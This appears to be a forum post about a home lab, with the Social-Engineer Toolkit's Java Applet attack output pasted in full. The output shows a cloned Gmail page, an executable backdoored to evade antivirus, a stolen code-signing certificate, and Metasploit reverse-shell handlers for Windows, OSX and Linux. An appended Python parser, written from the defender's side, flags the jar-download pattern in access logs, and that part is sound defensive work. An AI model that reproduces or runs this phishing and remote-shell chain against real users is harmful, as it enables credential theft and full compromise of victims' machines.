
Originally Posted by LHYX1
Looks like the server can't find some files. Could you post the exact steps you took?
First I got two machines inside VirtualBox: XP SP2 - 192.168.56.102, BackTrack 5 R2 - 192.168.56.101
Website Attack Vectors > Java Applet Attack Method > Web Templates > Gmail
Select a template:2
Code:
[*] Cloning the website: https://gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: GQ8v9SlNeEXSxym
[*] Malicious java applet website prepped for deployment
set:payloads> Windows Reverse_TCP Meterpreter
Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best
Backdoored Executable (BEST)
PORT of the listener [443] (Press Enter)
[*] Generating x64-based powershell injection code...
[*] Generating x86-based powershell injection code...
[*] Finished generating powershell injection attack and is encoded to bypass execution restriction...
[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
[*] Backdoor completed successfully. Payload is now hidden within a legit executable.
[*] UPX Encoding is set to ON, attempting to pack the executable with UPX encoding.
[-] Packing the executable and obfuscating PE file randomly, one moment.
[*] Digital Signature Stealing is ON, hijacking a legit digital certificate
[*] Generating OSX payloads through Metasploit...
[*] Generating Linux payloads through Metasploit...
***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************
[--] Tested on IE6, IE7, IE8, IE9, Safari, Opera, Chrome, and FireFox [--]
[*] Moving payload into cloned website.
[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
[-] ***
[-] * WARNING: Database support has been disabled
[-] ***
=[ metasploit v4.2.0-release [core:4.2 api:1.0]
+ -- --=[ 805 exploits - 451 auxiliary - 135 post
+ -- --=[ 246 payloads - 27 encoders - 8 nops
=[ svn r14805 updated 134 days ago (2012.02.23)
Warning: This copy of the Metasploit Framework was last updated 134 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
[*] Processing /pentest/exploits/set/src/program_junk/meta_config for ERB directives.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 443
LPORT => 443
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
PAYLOAD => osx/x86/shell_reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8080
LPORT => 8080
resource (/pentest/exploits/set/src/program_junk/meta_config)> set InitialAutoRunScript post/osx/gather/enum_osx
InitialAutoRunScript => post/osx/gather/enum_osx
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler...
[*] Exploit running as background job.
resource (/pentest/exploits/set/src/program_junk/meta_config)> use exploit/multi/handler
resource (/pentest/exploits/set/src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (/pentest/exploits/set/src/program_junk/meta_config)> set LPORT 8081
LPORT => 8081
resource (/pentest/exploits/set/src/program_junk/meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/pentest/exploits/set/src/program_junk/meta_config)> exploit -j
[*] Started reverse handler on 10.0.2.15:8080
[*] Starting the payload handler...
[*] Exploit running as background job.
msf exploit(handler) > 
[*] Started reverse handler on 10.0.2.15:8081
[*] Starting the payload handler...
After this I browse from the XP machine to the BackTrack IP 192.168.56.101,
then I get this on BT5...
192.168.56.102 - - [06/Jul/2012 22:36:12] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:20] "GET /Signed_Update.jar HTTP/1.1" 200 -
I uninstalled BT5 & XP, reinstalled & did an SET update too; it's the same picture I get.
Regards
skorpinok
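As an added example from the defender's side (not part of skorpinok's post or of SET itself): the access log above shows the pattern a Java applet delivery leaves in a web log, a landing-page GET followed within seconds by a 200 for a signed .jar from the same client. The parser below reads lines in the format shown in the post and flags clients matching that pattern; the sample lines are constructed to match the post's log, and the 30-second window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the shape of the access log quoted in the post.
SAMPLE_LOG = """\
192.168.56.102 - - [06/Jul/2012 22:36:12] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:13] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:19] "GET / HTTP/1.1" 200 -
192.168.56.102 - - [06/Jul/2012 22:36:20] "GET /Signed_Update.jar HTTP/1.1" 200 -
192.168.56.1 - - [06/Jul/2012 22:40:01] "GET / HTTP/1.1" 200 -
"""

# host - - [dd/Mon/yyyy hh:mm:ss] "METHOD /path HTTP/x.y" status -
LINE_RE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y %H:%M:%S")
    rec["status"] = int(rec["status"])
    return rec


def find_applet_fetches(log_text, window_seconds=30):
    """Return {client: count} for clients that fetched a .jar (HTTP 200)
    within window_seconds of a preceding non-jar request from the same client."""
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            by_client[rec["client"]].append(rec)
    hits = {}
    for client, recs in by_client.items():
        last_page, count = None, 0
        for r in recs:  # log lines are in time order
            if r["path"].lower().endswith(".jar") and r["status"] == 200:
                if last_page and (r["ts"] - last_page).total_seconds() <= window_seconds:
                    count += 1
            else:
                last_page = r["ts"]  # remember the latest page load
        if count:
            hits[client] = count
    return hits
```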